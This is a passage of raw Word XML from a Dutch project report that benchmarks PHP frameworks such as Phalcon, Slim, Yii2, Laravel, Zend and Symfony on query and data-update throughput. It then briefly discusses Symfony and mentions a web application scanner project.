                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3,588 (0.6%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="113B5E2A" w14:textId="5DDEC992" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00CA5808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>74.3 ms (5.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6B3A" w14:paraId="1B2C0363" w14:textId="77777777" w:rsidTr="00F730AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBE755"/>
          </w:tcPr>
          <w:p w14:paraId="605AEC67" w14:textId="1C228DCA" w:rsidR="004F6B3A" w:rsidRPr="00B94177" w:rsidRDefault="004F6B3A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Enkele query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B173C" w14:paraId="2429747C" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC644A9" w14:textId="56559B93" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="002B173C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phalcon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5744DED6" w14:textId="4DEF5134" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="00F53002">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="001F09AC" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>,604 (10.8%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0825909C" w14:textId="44B85A00" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="009B5320">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>29.4 ms (1.0%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="252B61DB" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4509D17A" w14:textId="6E7CE1EE" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24B5FCCE" w14:textId="01F567A7" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>9,779 (4.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74B02940" w14:textId="2DC1BB22" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00DA1DA2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>29.3 ms (</w:t>
            </w:r>
            <w:r w:rsidR="00730FFA" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>1.0%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="752DA909" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B0C949C" w14:textId="6554D0C2" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Yii2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CADF8D2" w14:textId="0F9A0011" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>6,789 (3.2%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="092F4318" w14:textId="0C432B75" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="001C029D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>39.6 ms (1.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="2086DE02" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77DF8EE2" w14:textId="0CAE7333" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Laravel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56797461" w14:textId="035D5B2B" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>5,385 (2.6%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C7285E2" w14:textId="4F7D3554" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00540F9E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>51.9 ms (1.8%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="155D61D6" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CDA76BA" w14:textId="1A2F77A3" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Zend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44099F47" w14:textId="5FAB4E24" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3,965 (1.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40303B3D" w14:textId="6D8C4D10" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="000B1156">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>67.9 ms (2.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B173C" w14:paraId="56F8FB70" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3360ECF2" w14:textId="28D2DB0B" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="002B173C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Symfony 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="286ED64F" w14:textId="56BA298A" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="001C7B9A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2,508 (1.2%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F2058BC" w14:textId="237B7653" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="00E44FC8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rP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B94177" w:rsidRDefault="001B723C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Data updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="7A1DE790" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58A3F147" w14:textId="3E83BD47" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="246C1F8A" w14:textId="498A4E27" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>768 (17.5%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6302B671" w14:textId="39939FA1" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00A43F92">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>330.0 ms (5.7</w:t>
            </w:r>
            <w:r w:rsidR="00EE5C77" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="713D5624" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5718668E" w14:textId="47302381" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Zend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E234C6C" w14:textId="49B36C07" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>766 (17.5%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B37A839" w14:textId="20A6C9AC" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00EE5C77">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>330.4 ms (5.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="679093C9" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72111F8E" w14:textId="1DBC4555" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Yii2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F46DCB" w14:textId="0D8A486C" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>762 (17.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D24CB1A" w14:textId="558ADB94" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="008579C8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>332.2 ms (5.8%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="4862C11B" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="040C3A34" w14:textId="4956C904" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phalcon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64217CE2" w14:textId="0B1FF7BC" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>642 (14.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73C0D971" w14:textId="6762DF04" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="004E44CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>398.4 ms (6.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00651762" w14:paraId="789CB71E" w14:textId="77777777" w:rsidTr="00353384">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2375A979" w14:textId="19F5A086" w:rsidR="00651762" w:rsidRPr="00B94177" w:rsidRDefault="00651762">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Symfony 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F33E7A" w14:textId="6D3B917A" w:rsidR="00651762" w:rsidRPr="00B94177" w:rsidRDefault="00651762">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>321 (7.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55B0BF03" w14:textId="7833A85F" w:rsidR="00651762" w:rsidRPr="00B94177" w:rsidRDefault="003C5ACC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>490</w:t>
            </w:r>
            <w:r w:rsidR="00531E3F" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.8 ms (8.5%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="6D12D8FA" w14:textId="77777777" w:rsidTr="00353384">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A6495C" w14:textId="36045AF9" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Laravel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46591382" w14:textId="34A0BED3" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="624E334C" w14:textId="15C57C79" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E65B833" w14:textId="2ABB426A" w:rsidR="00F35514" w:rsidRDefault="00B9069F" w:rsidP="00F35514">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252171264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64613889" wp14:editId="6BA06E37">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-902335</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-4818380</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D28F1" id="Rectangle 498" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.05pt;margin-top:-379.35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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00416841">
        <w:t>Tabel 3.7</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391D4EA" w14:textId="065BE935" w:rsidR="00D5423C" w:rsidRPr="00BB4E5D"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4C90C96C" w14:textId="4143CBA0" w:rsidR="00866303" w:rsidRPr="002C7958" w:rsidRDefault="002C7958">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r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42AB139B" w:rsidR="008D5DD7" w:rsidRPr="0093287C" w:rsidRDefault="008D5DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093287C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Symphony2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405C9336" w14:textId="797DDECD" w:rsidR="008D5DD7" w:rsidRDefault="00801FA5">
      <w:r>
        <w:t xml:space="preserve">Wat voor Zend geldt, geldt ook voor Symphony. Het is een PHP Framework dat </w:t>
      </w:r>
      <w:r w:rsidR="00A706A6">
        <w:t>bedoeld</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is voor grote complexe enterprice projecten. </w:t>
      </w:r>
      <w:r w:rsidR="00600F5F">
        <w:t xml:space="preserve">Het heeft een grote set van herbruikbare componenten. Veel van deze componenten </w:t>
      </w:r>
      <w:r w:rsidR="00BB4E5D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253195264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6CD959F4" wp14:editId="30B52A5D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1120523</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="27" name="Rectangle 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92BDA" id="Rectangle 27" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-88.2pt;width:25pt;height:1031.7pt;z-index:-2501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hAaZoCAACx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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00600F5F">
        <w:t>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AB61AD0" w:rsidR="00CE02C1" w:rsidRPr="009C73A3" w:rsidRDefault="00CC21CC">
      <w:r>
        <w:t>Voor dit project (</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t>)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650BF0">
        <w:t>W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p w14:paraId="15150DF8" w14:textId="7A168430"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4B131D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91E4"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HJp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S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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E76906">
        <w:t xml:space="preserve">3.5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00607C53">
        <w:t>Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E13070" w14:textId="54FB8AD5"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241096">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00BF30D9" w:rsidR="00E2204E" w:rsidRPr="001C726A" w:rsidRDefault="00E2204E" w:rsidP="00A435BE">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
